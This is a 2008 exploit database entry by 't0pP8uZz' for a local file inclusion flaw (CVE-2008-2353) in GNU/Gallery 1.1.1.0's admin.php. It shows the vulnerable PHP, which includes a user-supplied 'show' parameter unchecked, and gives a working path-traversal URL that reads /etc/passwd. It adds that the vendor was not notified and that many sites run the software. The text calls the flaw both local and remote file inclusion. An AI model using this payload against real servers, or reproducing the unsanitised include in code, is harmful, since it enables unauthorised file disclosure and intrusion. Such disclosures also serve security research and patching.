GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2008-05-17
date_updated: 2016-12-02
verified: 1
codes: OSVDB-45339;CVE-2008-2353
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comgnugallery-1.1.1.0.zip
--==+================================================================================+==--
--==+ GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 17 MAY 2008
Script Download: http://gnugallery.sourceforge.net/
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
GNU/Gallery suffers from a remote file inclusion vulnerability in the "admin.php" file.
Vulnerable Code:
<?php
if($_GET['show']=="") {
include("admin/index.php");
} else {
include("admin/".$_GET['show']);
}
?>
Vulnerability:
http://site.com/admin.php?show=../../../../../../../etc/passwd
NOTE/TIP:
fair amount of sites running, althou no good dork.
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
peace, t0pP8uZz
--==+================================================================================+==--
--==+ GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-05-18]